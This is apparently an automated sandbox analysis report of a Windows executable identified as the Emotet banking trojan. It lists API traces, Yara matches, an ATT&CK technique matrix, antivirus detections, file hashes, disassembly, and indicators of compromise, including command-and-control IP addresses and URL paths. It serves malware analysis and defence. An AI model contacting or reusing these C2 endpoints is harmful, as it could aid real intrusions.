          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00441EFF
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_00441E8B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,1_2_004420D1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,1_2_0043C0B5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_004421F9
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_00442192
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,1_2_00442235
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004429C1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,1_2_0044298D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_00442B00
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_00440CFD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,1_2_00415026
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,1_2_0044136B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,1_2_004415C3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,1_2_00441889
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,1_2_00443A6E
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,1_2_00441CDC
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,1_2_00441DF3
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,1_2_00441EFF
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,1_2_00441E8B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043BA29 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0043BA29
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043EB76 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0043EB76
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_004016F0 GetVersion,GetVersion,GetVersion,DragAcceptFiles,UpdateWindow,0_2_004016F0
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected EmotetShow sources
          Source: Yara matchFile source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Native API121Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information1Input Capture2System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
          Default AccountsCommand and Scripting Interpreter2Windows Service12Access Token Manipulation1Obfuscated Files or Information2LSASS MemorySystem Service Discovery1Remote Desktop ProtocolInput Capture2Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsService Execution12Logon Script (Windows)Windows Service12Software Packing1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Process Injection1File Deletion1NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading12LSA SecretsSecurity Software Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          YF4dF4w2Cr.exe41%MetadefenderBrowse
          YF4dF4w2Cr.exe86%ReversingLabsWin32.Trojan.Emotet
          YF4dF4w2Cr.exe100%AviraTR/AD.Emotet.ddim

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.YF4dF4w2Cr.exe.22f053f.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.YF4dF4w2Cr.exe.22f053f.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.fwdrrebrand.exe.400000.0.unpack100%AviraTR/AD.Emotet.ddimDownload File
          0.2.YF4dF4w2Cr.exe.400000.0.unpack100%AviraHEUR/AGEN.1137917Download File
          0.0.YF4dF4w2Cr.exe.400000.0.unpack100%AviraTR/AD.Emotet.ddimDownload File
          3.2.fwdrrebrand.exe.400000.0.unpack100%AviraHEUR/AGEN.1137917Download File
          2.2.fwdrrebrand.exe.400000.0.unpack100%AviraHEUR/AGEN.1137917Download File
          2.2.fwdrrebrand.exe.e4053f.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.YF4dF4w2Cr.exe.400000.0.unpack100%AviraTR/AD.Emotet.ddimDownload File
          1.2.YF4dF4w2Cr.exe.400000.0.unpack100%AviraHEUR/AGEN.1137917Download File
          3.2.fwdrrebrand.exe.e4053f.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.0.fwdrrebrand.exe.400000.0.unpack100%AviraTR/AD.Emotet.ddimDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://201.196.15.79/pnp/splash/loadan/merge/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://201.196.15.79/pnp/splash/loadan/merge/fwdrrebrand.exe, 00000003.00000002.911061816.0000000000199000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          144.76.62.10
          		unknownGermany
          		24940HETZNER-ASDEfalse
          203.99.188.203
          		unknownPakistan
          		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
          201.196.15.79
          		unknownCosta Rica
          		11830InstitutoCostarricensedeElectricidadyTelecomCRfalse
          200.55.168.82
          		unknownCuba
          		27725EmpresadeTelecomunicacionesdeCubaSACUfalse
          213.138.100.98
          		unknownUnited Kingdom
          		35425BYTEMARK-ASGBfalse
          190.117.206.153
          		unknownPeru
          		12252AmericaMovilPeruSACPEfalse
          203.99.187.137
          		unknownPakistan
          		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
          70.32.94.58
          		unknownUnited States
          		398110GO-DADDY-COM-LLCUSfalse

          General Information

          Joe Sandbox Version:31.0.0 Emerald
          Analysis ID:376398
          Start date:26.03.2021
          Start time:13:31:05
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:YF4dF4w2Cr (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:10
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal92.bank.troj.evad.winEXE@6/0@0/8
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 60.2% (good quality ratio 59%)
          • Quality average: 84.1%
          • Quality standard deviation: 23.5%
          HCA Information:
          • Successful, ratio: 72%
          • Number of executed functions: 174
          • Number of non-executed functions: 355
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/376398/sample/YF4dF4w2Cr.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          144.76.62.10Payment+Summary+-+Ref+Id-+Q82.docGet hashmaliciousBrowse
          • 144.76.62.10:8080/codec/img/loadan/merge/
          201.196.15.79KjYa5KetGb.exeGet hashmaliciousBrowse
            200.55.168.82Payment+Summary+-+Ref+Id-+Q82.docGet hashmaliciousBrowse
              213.138.100.98Payment+Summary+-+Ref+Id-+Q82.docGet hashmaliciousBrowse
                190.117.206.153Payment Summary - Ref Id- Q82.docGet hashmaliciousBrowse
                • 190.117.206.153:443/json/vermont/jit/
                description October 2019.docGet hashmaliciousBrowse
                • 190.117.206.153:443/walk/results/xian/merge/
                N.282 UPN 11.10.2019.docGet hashmaliciousBrowse
                • 190.117.206.153:443/enabled/
                20190918_90139353.docGet hashmaliciousBrowse
                • 190.117.206.153:443/pdf/stubs/loadan/
                20190918_90139353.docGet hashmaliciousBrowse
                • 190.117.206.153:443/odbc/usbccid/
                20190918_90139353.docGet hashmaliciousBrowse
                • 190.117.206.153:443/sess/
                548.exeGet hashmaliciousBrowse
                • 190.117.206.153:443/add/
                20190918_90139353.docGet hashmaliciousBrowse
                • 190.117.206.153:443/stubs/
                20190918_90139353.docGet hashmaliciousBrowse
                • 190.117.206.153:443/codec/badge/
                20190918_90139353.docGet hashmaliciousBrowse
                • 190.117.206.153:443/child/mult/
                9003-09202019912.docGet hashmaliciousBrowse
                • 190.117.206.153:443/srvc/badge/jit/merge/
                9003-09202019912.docGet hashmaliciousBrowse
                • 190.117.206.153:443/sess/
                9003-09202019912.docGet hashmaliciousBrowse
                • 190.117.206.153:443/enabled/balloon/jit/merge/
                message_3392059.docGet hashmaliciousBrowse
                • 190.117.206.153:443/forced/arizona/loadan/
                message_3392059.docGet hashmaliciousBrowse
                • 190.117.206.153:443/splash/splash/pdf/
                message_3392059.docGet hashmaliciousBrowse
                • 190.117.206.153:443/nsip/jit/loadan/merge/
                Documents-09_18_2019-Q212286.docGet hashmaliciousBrowse
                • 190.117.206.153:443/vermont/enable/
                Documents-09_18_2019-Q212286.docGet hashmaliciousBrowse
                • 190.117.206.153:443/nsip/free/jit/merge/
                Documents-09_18_2019-Q212286.docGet hashmaliciousBrowse
                • 190.117.206.153:443/sym/img/loadan/merge/
                Soumissions_19092019-5002924.docGet hashmaliciousBrowse
                • 190.117.206.153:443/publish/enable/jit/merge/

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                InstitutoCostarricensedeElectricidadyTelecomCR1.shGet hashmaliciousBrowse
                • 190.171.2.203
                7mB0FoVcSn.exeGet hashmaliciousBrowse
                • 201.203.99.129
                rJz6SePuqu.dllGet hashmaliciousBrowse
                • 201.203.96.60
                KjYa5KetGb.exeGet hashmaliciousBrowse
                • 201.196.15.79
                68Faktura_VAT_8263562736.jsGet hashmaliciousBrowse
                • 200.91.115.40
                68Faktura_VAT_837478883422.jsGet hashmaliciousBrowse
                • 200.91.115.40
                INV-DK7408221-609.docGet hashmaliciousBrowse
                • 181.193.115.50
                http://nowley-rus.ru/administrator/cache/En_us/Black-FridayGet hashmaliciousBrowse
                • 181.193.115.50
                Invoice_WCO5655_file.docGet hashmaliciousBrowse
                • 181.193.115.50
                INVOICE_NN6267_FILE.docGet hashmaliciousBrowse
                • 181.193.115.50
                dark.armGet hashmaliciousBrowse
                • 201.206.147.94
                vnc.exeGet hashmaliciousBrowse
                • 201.197.138.2
                qwerty2.exeGet hashmaliciousBrowse
                • 200.91.115.40
                9ZtszOkjm.exeGet hashmaliciousBrowse
                • 201.237.32.61
                6520188910_891086.jpg.jsGet hashmaliciousBrowse
                • 200.91.115.40
                Phot.exeGet hashmaliciousBrowse
                • 181.193.42.2
                INV_201901_FXJ47525663-991.docGet hashmaliciousBrowse
                • 201.194.127.211
                INV_201901_FXJ47525663-991.docGet hashmaliciousBrowse
                • 201.194.127.211
                adminsvcs.exeGet hashmaliciousBrowse
                • 201.194.127.211
                FA_25012019_91386378.docGet hashmaliciousBrowse
                • 201.194.127.211
                HETZNER-ASDEY79FTQtEqG.exeGet hashmaliciousBrowse
                • 144.76.242.196
                2sOfVsf40V.exeGet hashmaliciousBrowse
                • 88.99.66.31
                mIkTGifBOr.exeGet hashmaliciousBrowse
                • 195.201.225.248
                JJvkhWtyEm.exeGet hashmaliciousBrowse
                • 195.201.225.248
                ajESKcIz8f.exeGet hashmaliciousBrowse
                • 88.99.66.31
                ed8a7ffec56f450a365e758012db092883bbd23565f3f.exeGet hashmaliciousBrowse
                • 78.46.142.223
                KsNar1S9Ao.exeGet hashmaliciousBrowse
                • 78.46.142.223
                81e32711095862add92b6628569a86fad212e146dc41b.exeGet hashmaliciousBrowse
                • 78.46.142.223
                3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exeGet hashmaliciousBrowse
                • 78.46.142.223
                uLVu6RlD4i.exeGet hashmaliciousBrowse
                • 195.201.225.248
                hLOTlwUNup.exeGet hashmaliciousBrowse
                • 88.99.66.31
                vZzN8hoqnD.exeGet hashmaliciousBrowse
                • 88.99.66.31
                lm2LHApR75.exeGet hashmaliciousBrowse
                • 195.201.225.248
                06607b04da0cd27e4a7abff3df7ee0be86df8226e81a5.exeGet hashmaliciousBrowse
                • 78.46.142.223
                ZYKk8dtiEk.exeGet hashmaliciousBrowse
                • 78.46.142.223
                FileZilla_3.53.0_win64_sponsored-setup.exeGet hashmaliciousBrowse
                • 49.12.121.47
                dUVOxpQFkT.exeGet hashmaliciousBrowse
                • 78.46.142.223
                RsApxCz3YQ.exeGet hashmaliciousBrowse
                • 195.201.225.248
                l59qWeKoK3.exeGet hashmaliciousBrowse
                • 195.201.225.248
                83f723bc00bdf9847f4c2940332ef62253dd09d4b324b.exeGet hashmaliciousBrowse
                • 78.46.142.223
                PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK1.shGet hashmaliciousBrowse
                • 182.186.35.164
                Payment TT Copy. PDF.exeGet hashmaliciousBrowse
                • 182.180.156.51
                PDFXCview.exeGet hashmaliciousBrowse
                • 39.41.93.184
                mssecsvc.exeGet hashmaliciousBrowse
                • 182.190.53.85
                iuE5dYsTLd.exeGet hashmaliciousBrowse
                • 182.186.127.118
                iGet hashmaliciousBrowse
                • 119.157.148.99
                JaQ0skAudI.exeGet hashmaliciousBrowse
                • 182.186.89.232
                Y9UrMMIwN8.exeGet hashmaliciousBrowse
                • 39.52.155.1
                SALES AND EXPENSES.xlsGet hashmaliciousBrowse
                • 182.186.224.209
                FhqpDjkst.exeGet hashmaliciousBrowse
                • 182.180.143.39
                INV-XVH-O086312.docGet hashmaliciousBrowse
                • 182.180.77.215
                INV-XVH-O086312.docGet hashmaliciousBrowse
                • 182.180.77.215
                17Bill of lading Status_pdf.exeGet hashmaliciousBrowse
                • 182.176.115.69
                mssecsvr.exeGet hashmaliciousBrowse
                • 39.36.213.233
                zilla.exeGet hashmaliciousBrowse
                • 182.182.230.248
                MP3Rocket.exeGet hashmaliciousBrowse
                • 182.186.105.125
                a0UaSwRbSm.exeGet hashmaliciousBrowse
                • 119.158.43.166
                41messag.exeGet hashmaliciousBrowse
                • 39.58.46.97
                formneutral.exeGet hashmaliciousBrowse
                • 182.180.170.72
                http://svai-nkt.ru/En/corporation/Invoice_number/jQxe-VGfy_PVswUKb-ZLxGet hashmaliciousBrowse
                • 39.61.49.128

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.584976742352093
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:YF4dF4w2Cr.exe
                File size:502272
                MD5:f4d1470af3a7d82560b38558b132d468
                SHA1:0c45cf4e32116eae8d73b52c140f5d91a19ee8ea
                SHA256:6fa0dd6002d4b4e7ebabefc7f4f90f36fc53069e0cf4e845f683fb087d476e90
                SHA512:1f45093e1509d86ab03ee2c6f15a6dbc3ed4f41cac3c8faf5ae66445b787b58bf9e69d047d7ead3d1d22284d351fbb739a7a7eb73180f746f3d4f621859206c8
                SSDEEP:12288:x1n6BAlECcMIR4WlptZ2uOIR4bi6/Myw52BLhDG5Fq:x16SbcMMlpLLOS
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8...V...V...V..s;...V..s-...V...W...V.......V.......V.....X.V.......V.......V.......V.Rich..V.........................PE..L..

                File Icon

                Icon Hash:64e4c4e4e4c4e4f0

                Static PE Info

                General

                Entrypoint:0x4316ec
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x5D99FBDA [Sun Oct 6 14:36:10 2019 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:0
                File Version Major:5
                File Version Minor:0
                Subsystem Version Major:5
                Subsystem Version Minor:0
                Import Hash:9f251661407b9fa6502b6b65d148504e

                Entrypoint Preview

                Instruction
                call 00007FBC6C9E301Dh
                jmp 00007FBC6C9D8B5Dh
                push 0000000Ch
                push 0045DF00h
                call 00007FBC6C9D8DFBh
                mov esi, dword ptr [ebp+08h]
                test esi, esi
                je 00007FBC6C9D8D57h
                cmp dword ptr [00468784h], 03h
                jne 00007FBC6C9D8D25h
                push 00000004h
                call 00007FBC6C9E168Bh
                pop ecx
                and dword ptr [ebp-04h], 00000000h
                push esi
                call 00007FBC6C9E16B3h
                pop ecx
                mov dword ptr [ebp-1Ch], eax
                test eax, eax
                je 00007FBC6C9D8CEBh
                push esi
                push eax
                call 00007FBC6C9E16D4h
                pop ecx
                pop ecx
                mov dword ptr [ebp-04h], FFFFFFFEh
                call 00007FBC6C9D8CF0h
                cmp dword ptr [ebp-1Ch], 00000000h
                jne 00007FBC6C9D8D19h
                push dword ptr [ebp+08h]
                jmp 00007FBC6C9D8CECh
                push 00000004h
                call 00007FBC6C9E1577h
                pop ecx
                ret
                push esi
                push 00000000h
                push dword ptr [00466EACh]
                call dword ptr [0044E22Ch]
                test eax, eax
                jne 00007FBC6C9D8CF8h
                call 00007FBC6C9D92B6h
                mov esi, eax
                call dword ptr [0044E3ACh]
                push eax
                call 00007FBC6C9D9266h
                mov dword ptr [esi], eax
                pop ecx
                call 00007FBC6C9D8DBFh
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                push 00000000h
                push dword ptr [ebp+14h]
                push dword ptr [ebp+10h]
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp+08h]
                call 00007FBC6C9E3008h
                add esp, 14h
                pop ebp
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                push ebx
                xor ebx, ebx
                push esi
                push edi
                cmp eax, ebx
                je 00007FBC6C9D8CE9h
                mov edi, dword ptr [ebp+00h]

                Rich Headers

                Programming Language:
                • [ C ] VS2008 build 21022
                • [LNK] VS2008 build 21022
                • [ C ] VS2005 build 50727
                • [ASM] VS2008 build 21022
                • [IMP] VS2005 build 50727
                • [RES] VS2008 build 21022
                • [EXP] VS2008 build 21022
                • [C++] VS2008 build 21022

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x610800x45.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x5eb040xdc.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x182e2.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x57c600x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x4e0000x704.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5ea540x40.rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x4c25b0x4c400False0.565689036885data6.53895852223IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata0x4e0000x130c50x13200False0.320606107026data5.00400278699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x620000x67b80x2c00False0.302379261364data4.20689124117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc0x690000x182e20x18400False0.639839722938data6.84520055945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_CURSOR0x6a6bc0x134dataEnglishUnited States
                RT_CURSOR0x6a7f00xb4dataEnglishUnited States
                RT_CURSOR0x6a8a40x134dataEnglishUnited States
